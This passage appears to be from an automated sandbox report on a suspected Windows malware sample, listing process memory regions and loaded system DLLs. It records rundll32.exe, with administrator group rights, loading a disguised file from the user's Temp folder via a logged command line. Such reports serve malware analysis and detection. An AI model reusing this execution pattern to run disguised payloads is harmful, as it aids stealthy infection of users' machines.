start_va = 0x7ff6a9ae0000 end_va = 0x7ff6a9bdffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6a9ae0000" filename = "" Region: id = 954 start_va = 0x1e397d20000 end_va = 0x1e397dddfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 955 start_va = 0x7ff86f210000 end_va = 0x7ff86f2acfff monitored = 0 entry_point = 0x7ff86f2178a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 956 start_va = 0xa163170000 end_va = 0xa1631effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000a163170000" filename = "" Region: id = 957 start_va = 0x7ff86f2b0000 end_va = 0x7ff86f52cfff monitored = 0 entry_point = 0x7ff86f384970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 958 start_va = 0x7ff870fd0000 end_va = 0x7ff8710ebfff monitored = 0 entry_point = 0x7ff8710102b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 959 start_va = 0x7ff86e4b0000 end_va = 0x7ff86e519fff monitored = 0 entry_point = 0x7ff86e4e6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 960 start_va = 0x7ff86f070000 end_va = 0x7ff86f124fff monitored = 0 entry_point = 0x7ff86f0b22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 961 start_va = 0x7ff86f530000 end_va = 0x7ff86f54bfff monitored = 0 entry_point = 0x7ff86f5331a0 region_type = mapped_file name = "imagehlp.dll" filename = "\\Windows\\System32\\imagehlp.dll" (normalized: "c:\\windows\\system32\\imagehlp.dll") Region: id = 962 start_va = 0x1e397de0000 end_va = 0x1e397eaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e397de0000" filename = "" Region: id = 963 start_va = 0x1e397b80000 end_va = 0x1e397b86fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e397b80000" filename = "" Region: id = 964 start_va = 0x1e397be0000 end_va = 0x1e397be6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e397be0000" filename = "" Region: id = 965 start_va = 0x1e397c20000 end_va = 0x1e397d1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e397c20000" filename = "" Region: id = 966 start_va = 0x1e397de0000 end_va = 0x1e397e74fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001e397de0000" filename = "" Region: id = 967 start_va = 0x1e397ea0000 end_va = 0x1e397eaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e397ea0000" filename = "" Region: id = 968 start_va = 0x1e397de0000 end_va = 0x1e397e74fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001e397de0000" filename = "" Region: id = 969 start_va = 0x1e397de0000 end_va = 0x1e397e74fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001e397de0000" filename = "" Region: id = 970 start_va = 0x1e397bf0000 end_va = 0x1e397bf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001e397bf0000" filename = "" Region: id = 986 start_va = 0x7ff86cd00000 end_va = 0x7ff86cd78fff monitored = 0 entry_point = 0x7ff86cd1fb90 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 987 start_va = 0x7ff6a9730000 end_va = 0x7ff6a9ad0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Thread: id = 44 os_tid = 0xba4 Thread: id = 45 os_tid = 0xba0 Process: id = "6" image_name = "rundll32.exe" filename = "c:\\windows\\syswow64\\rundll32.exe" page_root = "0x18bd0000" os_pid = "0x9a8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x11b8" cmd_line = "\"C:\\Windows\\system32\\rundll32.exe\" C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\\\anomoeomery.metalizedCredence Nikn " cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f188" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 971 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 972 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 973 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 974 start_va = 0x90000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 975 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 976 start_va = 0x400000 end_va = 0x401fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 977 start_va = 0xb10000 end_va = 0xb21fff monitored = 0 entry_point = 0xb14600 region_type = mapped_file name = "rundll32.exe" filename = "\\Windows\\SysWOW64\\rundll32.exe" (normalized: "c:\\windows\\syswow64\\rundll32.exe") Region: id = 978 start_va = 0xb30000 end_va = 0x4b2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b30000" filename = "" Region: id = 979 start_va = 0x770a0000 end_va = 0x7721afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 980 start_va = 0x7f6d0000 end_va = 0x7f6f2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6d0000" filename = "" Region: id = 981 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 982 start_va = 0x7fff0000 end_va = 0x7df871dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 983 start_va = 0x7df871e00000 end_va = 0x7ff871dfffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df871e00000" filename = "" Region: id = 984 start_va = 0x7ff871e00000 end_va = 0x7ff871fc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 985 start_va = 0x7ff871fc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff871fc1000" filename = "" Region: id = 988 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 989 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 990 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 991 start_va = 0x100000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 992 start_va = 0x53800000 end_va = 0x5384ffff monitored = 0 entry_point = 0x53818180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 993 start_va = 0x53850000 end_va = 0x538c9fff monitored = 0 entry_point = 0x53863290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 994 start_va = 0x75a70000 end_va = 0x75b4ffff monitored = 0 entry_point = 0x75a83980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 995 start_va = 0x537f0000 end_va = 0x537f7fff monitored = 0 entry_point = 0x537f17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 996 start_va = 0x410000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 997 start_va = 0x75a70000 end_va = 0x75b4ffff monitored = 0 entry_point = 0x75a83980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 998 start_va = 0x75250000 end_va = 0x753cdfff monitored = 0 entry_point = 0x75301b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1001 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1002 start_va = 0x7f5d0000 end_va = 0x7f6cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f5d0000" filename = "" Region: id = 1003 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1004 start_va = 0x73d20000 end_va = 0x73db1fff monitored = 0 entry_point = 0x73d60380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 1005 start_va = 0x7f220000 end_va = 0x7f5c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 1006 start_va = 0x4c0000 end_va = 0x4c3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 1007 start_va = 0x550000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1008 start_va = 0x6f500000 end_va = 0x6f777fff monitored = 0 entry_point = 0x6f515e90 region_type = mapped_file name = "aclayers.dll" filename = "\\Windows\\AppPatch\\AcLayers.dll" (normalized: "c:\\windows\\apppatch\\aclayers.dll") Region: id = 1009 start_va = 0x75cf0000 end_va = 0x75dadfff monitored = 0 entry_point = 0x75d25630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1010 start_va = 0x753d0000 end_va = 0x75516fff monitored = 0 entry_point = 0x753e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1011 start_va = 0x75db0000 end_va = 0x75efefff monitored = 0 entry_point = 0x75e66820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1012 start_va = 0x73df0000 end_va = 0x751eefff monitored = 0 entry_point = 0x73fab990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1013 start_va = 0x757b0000 end_va = 0x757e6fff monitored = 0 entry_point = 0x757b3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 1014 start_va = 0x76980000 end_va = 0x76e78fff monitored = 0 entry_point = 0x76b87610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 1015 start_va = 0x758a0000 end_va = 0x75a5cfff monitored = 0 entry_point = 0x75982a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1016 start_va = 0x76650000 end_va = 0x766fcfff monitored = 0 entry_point = 0x76664f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1018 start_va = 0x73dd0000 end_va = 0x73dedfff monitored = 0 entry_point = 0x73ddb640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1019 start_va = 0x73dc0000 end_va = 0x73dc9fff monitored = 0 entry_point = 0x73dc2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1020 start_va = 0x767a0000 end_va = 0x767f7fff monitored = 0 entry_point = 0x767e25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1021 start_va = 0x75520000 end_va = 0x75563fff monitored = 0 entry_point = 0x75539d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1022 start_va = 0x75820000 end_va = 0x7589afff monitored = 0 entry_point = 0x7583e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1024 start_va = 0x75bb0000 end_va = 0x75bf4fff monitored = 0 entry_point = 0x75bcde90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1025 start_va = 0x75a60000 end_va = 0x75a6bfff monitored = 0 entry_point = 0x75a63930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 1026 start_va = 0x75570000 end_va = 0x755fcfff monitored = 0 entry_point = 0x755b9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 1027 start_va = 0x76070000 end_va = 0x760b3fff monitored = 0 entry_point = 0x76077410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 1028 start_va = 0x75f00000 end_va = 0x75f0efff monitored = 0 entry_point = 0x75f02e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1029 start_va = 0x76700000 end_va = 0x76791fff monitored = 0 entry_point = 0x76738cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1030 start_va = 0x76240000 end_va = 0x7664afff monitored = 0 entry_point = 0x7626adf0 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 1031 start_va = 0x6f4e0000 end_va = 0x6f4f5fff monitored = 0 entry_point = 0x6f4e21d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 1032 start_va = 0x4d0000 end_va = 0x4d2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sfc.dll" filename = "\\Windows\\SysWOW64\\sfc.dll" (normalized: "c:\\windows\\syswow64\\sfc.dll") Region: id = 1033 start_va = 0x6f470000 end_va = 0x6f4d6fff monitored = 0 entry_point = 0x6f485a00 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\SysWOW64\\winspool.drv" (normalized: "c:\\windows\\syswow64\\winspool.drv") Region: id = 1034 start_va = 0x712c0000 end_va = 0x712dafff monitored = 0 entry_point = 0x712c9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 1035 start_va = 0x6f460000 end_va = 0x6f46efff monitored = 0 entry_point = 0x6f4663e0 region_type = mapped_file name = "sfc_os.dll" filename = "\\Windows\\SysWOW64\\sfc_os.dll" (normalized: "c:\\windows\\syswow64\\sfc_os.dll") Region: id = 1036 start_va = 0x650000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 1037 start_va = 0x4e0000 end_va = 0x509fff monitored = 0 entry_point = 0x4e5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1038 start_va = 0x650000 end_va = 0x7d7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 1039 start_va = 0x810000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Region: id = 1040 start_va = 0x757f0000 end_va = 0x7581afff monitored = 0 entry_point = 0x757f5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1041 start_va = 0x4e0000 end_va = 0x4e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "rundll32.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\rundll32.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\rundll32.exe.mui") Region: id = 1042 start_va = 0x820000 end_va = 0x9a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 1043 start_va = 0x4b30000 end_va = 0x5f2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b30000" filename = "" Region: id = 1044 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1045 start_va = 0x100000 end_va = 0x100fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 1046 start_va = 0x140000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 1047 start_va = 0x9b0000 end_va = 0xa99fff monitored = 0 entry_point = 0x9ed650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1049 start_va = 0x75600000 end_va = 0x7561afff monitored = 0 entry_point = 0x756073e0 region_type = mapped_file name = "imagehlp.dll" filename = "\\Windows\\SysWOW64\\imagehlp.dll" (normalized: "c:\\windows\\syswow64\\imagehlp.dll") Region: id = 1050 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 1051 start_va = 0x190000 end_va = 0x1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 1052 start_va = 0x9b0000 end_va = 0xa44fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "anomoeomery.metalizedcredence" filename = "\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\anomoeomery.metalizedCredence" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\anomoeomery.metalizedcredence") Region: id = 1053 start_va = 0x9b0000 end_va = 0xa44fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "anomoeomery.metalizedcredence" filename = "\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\anomoeomery.metalizedCredence" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\anomoeomery.metalizedcredence") Region: id = 1054 start_va = 0x9b0000 end_va = 0xa44fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "anomoeomery.metalizedcredence" filename = "\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\anomoeomery.metalizedCredence" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\anomoeomery.metalizedcredence") Region: id = 1055 start_va = 0x110000 end_va = 0x110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 1056 start_va = 0x10000000 end_va = 0x10095fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "anomoeomery.metalizedcredence" filename = "\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\anomoeomery.metalizedCredence" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\anomoeomery.metalizedcredence") Region: id = 1057 start_va = 0x76fb0000 end_va = 0x7709afff monitored = 0 entry_point = 0x76fed650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1058 start_va = 0x4f0000 end_va = 0x4fdfff monitored = 0 entry_point = 0x4f4600 region_type = mapped_file name = "rundll32.exe" filename = "\\Windows\\SysWOW64\\rundll32.exe" (normalized: "c:\\windows\\syswow64\\rundll32.exe") Region: id = 1059 start_va = 0x73ca0000 end_va = 0x73d14fff monitored = 0 entry_point = 0x73cd9a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1060 start_va = 0x9b0000 end_va = 0xadffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009b0000" filename = "" Region: id = 1061 start_va = 0x76e80000 end_va = 0x76f9efff monitored = 0 entry_point = 0x76ec5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1062 start_va = 0x4f0000 end_va = 0x4f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 1063 start_va = 0x9b0000 end_va = 0xa6bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009b0000" filename = "" Region: id = 1064 start_va = 0xad0000 end_va = 0xadffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ad0000" filename = "" Region: id = 1065 start_va = 0x4f0000 end_va = 0x4f3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 1066 start_va = 0x73c80000 end_va = 0x73c9cfff monitored = 0 entry_point = 0x73c83b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1067 start_va = 0x500000 end_va = 0x502fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 1068 start_va = 0x5f30000 end_va = 0x603efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005f30000" filename = "" Region: id = 1069 start_va = 0x510000 end_va = 0x533fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 1070 start_va = 0x6f2e0000 end_va = 0x6f452fff monitored = 0 entry_point = 0x6f38d220 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\SysWOW64\\WindowsCodecs.dll" (normalized: "c:\\windows\\syswow64\\windowscodecs.dll") Region: id = 1071 start_va = 0x6040000 end_va = 0x629ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006040000" filename = "" Region: id = 1072 start_va = 0xa70000 end_va = 0xaaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id = 1073 start_va = 0x6040000 end_va = 0x607ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006040000" filename = "" Region: id = 1074 start_va = 0x6200000 end_va = 0x629ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006200000" filename = "" Region: id = 1075 start_va = 0x75f20000 end_va = 0x75f32fff monitored = 0 entry_point = 0x75f21d20 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 1076 start_va = 0x6f2c0000 end_va = 0x6f2dbfff monitored = 0 entry_point = 0x6f2c4720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 1077 start_va = 0x6f2a0000 end_va = 0x6f2b4fff monitored = 0 entry_point = 0x6f2a5210 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 1078 start_va = 0x6f290000 end_va = 0x6f299fff monitored = 0 entry_point = 0x6f2928d0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 1079 start_va = 0x500000 end_va = 0x503fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 1080 start_va = 0x6f260000 end_va = 0x6f28efff monitored = 0 entry_point = 0x6f275140 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\SysWOW64\\logoncli.dll" (normalized: "c:\\windows\\syswow64\\logoncli.dll") Region: id = 1081 start_va = 0x6f250000 end_va = 0x6f25ffff monitored = 0 entry_point = 0x6f2534d0 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 1082 start_va = 0x6f230000 end_va = 0x6f248fff monitored = 0 entry_point = 0x6f2347e0 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 1083 start_va = 0x751f0000 end_va = 0x7524efff monitored = 0 entry_point = 0x751f4af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1084 start_va = 0x540000 end_va = 0x543fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1085 start_va = 0x7e0000 end_va = 0x7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 1086 start_va = 0x6080000 end_va = 0x617ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006080000" filename = "" Region: id = 1087 start_va = 0x7e0000 end_va = 0x7fbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 1088 start_va = 0x800000 end_va = 0x80dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 1089 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1090 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1091 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1092 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1093 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1094 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 